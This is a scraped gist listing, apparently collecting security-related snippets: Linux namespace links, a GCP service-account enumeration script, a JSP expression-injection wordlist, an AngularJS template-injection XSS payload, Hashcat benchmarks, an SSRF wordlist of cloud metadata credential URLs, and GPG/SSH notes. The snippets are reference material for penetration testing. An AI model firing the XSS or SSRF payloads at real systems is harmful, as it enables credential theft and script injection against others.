Container security notes
Internet references
Kernel and architecture
-
namespaces - overview of Linux namespaces http://man7.org/linux/man-pages/man7/namespaces.7.html
-
mount_namespaces - overview of Linux mount namespaces
carnal0wnage
/ gcp_enum.sh
Last active Dec 13, 2020
use the gcloud utilities to enumerate as much access as possible from a GCP service account json file. see blog post: <to insert>
View gcp_enum.sh
| # gcloud auth activate-service-account --key-file=85.json | |
| # gcloud projects list | |
| project="my-project" | |
| space="" | |
| echo "gcloud auth list" | |
| gcloud auth list | |
| echo -e "$space" |
arbazkiraak
/ jsp-jstl-intruders.txt
Last active Nov 30, 2020
wordlist generated Based on : https://medium.com/@adrien_jeanneau/how-i-was-able-to-list-some-internal-information-from-paypal-bugbounty-ca8d217a397c
View jsp-jstl-intruders.txt
| ${0 } | |
| ${0 == pageList.maxPage} | |
| ${1} | |
| ${1 eq currentPageNumber } | |
| ${5} | |
| ${5/6} | |
| ${a+1 } | |
| ${a.academyName} | |
| ${a.academyNumber} | |
| ${academyNumber==a.academyNumber} |
View README.md
briangershon
/ gist:fa9feb08e6a65d52bdc35c738d8cf104
Created Jan 8, 2017
Log Request Body for Debugging (golang)
View gist:fa9feb08e6a65d52bdc35c738d8cf104
| buf, bodyErr := ioutil.ReadAll(r.Body) | |
| if bodyErr != nil { | |
| log.Print("bodyErr ", bodyErr.Error()) | |
| http.Error(w, bodyErr.Error(), http.StatusInternalServerError) | |
| return | |
| } | |
| rdr1 := ioutil.NopCloser(bytes.NewBuffer(buf)) | |
| rdr2 := ioutil.NopCloser(bytes.NewBuffer(buf)) | |
| log.Printf("BODY: %q", rdr1) |
View AngularTI.md
1.3.2 and below
{{7*7}}
'a'.constructor.fromCharCode=[].join;
'a'.constructor[0]='\u003ciframe onload=alert(/Backdoored/)\u003e';
View 8x1080.md
8x Nvidia GTX 1080 Hashcat Benchmarks
Product: Sagitta Brutalis 1080 (PN S3480-GTX-1080-2697-128)
Software: Hashcat v3.00-beta-145-g069634a, Nvidia driver 367.18
Accelerator: 8x Nvidia GTX 1080 Founders Edition
Highlights
BuffaloWill
/ cloud_metadata.txt
Last active Jan 25, 2021
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
| ## IPv6 Tests | |
| http://[::ffff:169.254.169.254] | |
| http://[0:0:0:0:0:ffff:169.254.169.254] | |
| ## AWS | |
| # Amazon Web Services (No Header Required) | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] |
apolloclark
/ aws cli cheatsheet.md
Last active Jan 24, 2021
andrewlkho
/ gist:7373190
Last active Sep 28, 2020
How to use authentication subkeys in gpg for SSH public key authentication
View gist:7373190
GPG subkeys marked with the "authenticate" capability can be used for public
key authentication with SSH. This is done using gpg-agent which, using the
--enable-ssh-support option, can implement the agent protocol used by SSH.
Requirements
A working gpg2 setup is required. It may be possible to use gpg 1.4 but with gpg-agent compiled from gpg2. If you are using OS X 10.9 (Mavericks) then you may find the instructions [here][1] useful.